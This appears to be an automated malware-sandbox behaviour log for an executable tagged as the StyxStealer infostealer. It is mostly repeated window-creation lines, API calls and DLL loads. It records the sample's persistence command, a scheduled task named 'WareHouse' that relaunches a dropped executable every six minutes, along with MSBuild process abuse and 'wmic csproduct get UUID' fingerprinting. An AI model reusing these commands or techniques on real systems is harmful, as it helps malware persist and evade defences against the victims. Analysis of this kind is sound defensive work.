                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0261B72C NtWow64QueryInformationProcess64
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0261B738 NtWow64ReadVirtualMemory64
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0261D0A8 NtWow64ReadVirtualMemory64
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0261CD99 NtWow64QueryInformationProcess64
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 11_2_0128C560 NtWow64QueryInformationProcess64
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 11_2_0128C750 NtWow64ReadVirtualMemory64
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 11_2_0128C55A NtWow64QueryInformationProcess64
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 11_2_0128C748 NtWow64ReadVirtualMemory64
                  Source: Mu7iyblZk8.exe, 00000000.00000002.1406837026.000000001B580000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamegh2q.dll4 vs Mu7iyblZk8.exe
                  Source: Mu7iyblZk8.exe, 00000000.00000002.1404731900.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamegh2q.dll4 vs Mu7iyblZk8.exe
                  Source: Mu7iyblZk8.exe, 00000000.00000002.1404731900.0000000002C81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameStyxStealer.exe8 vs Mu7iyblZk8.exe
                  Source: Mu7iyblZk8.exe, 00000000.00000002.1404853569.0000000012C88000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameStyxStealer.exe8 vs Mu7iyblZk8.exe
                  Source: classification engine Classification label: mal100.spyw.evad.winEXE@19/10@2/3
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Victim_SID[1].bd
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8020:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4984:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Mutant created: NULL
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
                  Source: Mu7iyblZk8.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: Mu7iyblZk8.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: Mu7iyblZk8.exe Virustotal: Detection: 24%
                  Source: Mu7iyblZk8.exe ReversingLabs: Detection: 36%
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exe File read: C:\Users\user\Desktop\Mu7iyblZk8.exe
                  Source: unknown Process created: C:\Users\user\Desktop\Mu7iyblZk8.exe "C:\Users\user\Desktop\Mu7iyblZk8.exe"
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c schtasks /create /tn "WareHouse" /tr "C:\Users\user\AppData\Roaming\WareHouse.exe " /sc minute /mo 6 /f
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "WareHouse" /tr "C:\Users\user\AppData\Roaming\WareHouse.exe " /sc minute /mo 6 /f
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe "wmic" csproduct get UUID
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknown Process created: C:\Users\user\AppData\Roaming\WareHouse.exe C:\Users\user\AppData\Roaming\WareHouse.exe
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe "wmic" csproduct get UUID
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exe Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, wininet.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll, amsi.dll, userenv.dll, ntmarta.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, sspicli.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll, wsock32.dll, vcruntime140.dll, userenv.dll, dpapi.dll, uxtheme.dll, edputil.dll
                  Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll, taskschd.dll, sspicli.dll, xmllite.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iphlpapi.dll, framedynos.dll, sspicli.dll, kernel.appcore.dll, wbemcomn.dll, msxml6.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, uxtheme.dll, vcruntime140.dll, amsi.dll, userenv.dll, profapi.dll, version.dll, vbscript.dll, sxs.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: wininet.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: netutils.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: schannel.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Section loaded: userenv.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasapi32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasman.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rtutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dhcpcsvc6.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: schannel.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mskeyprotect.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncrypt.dll
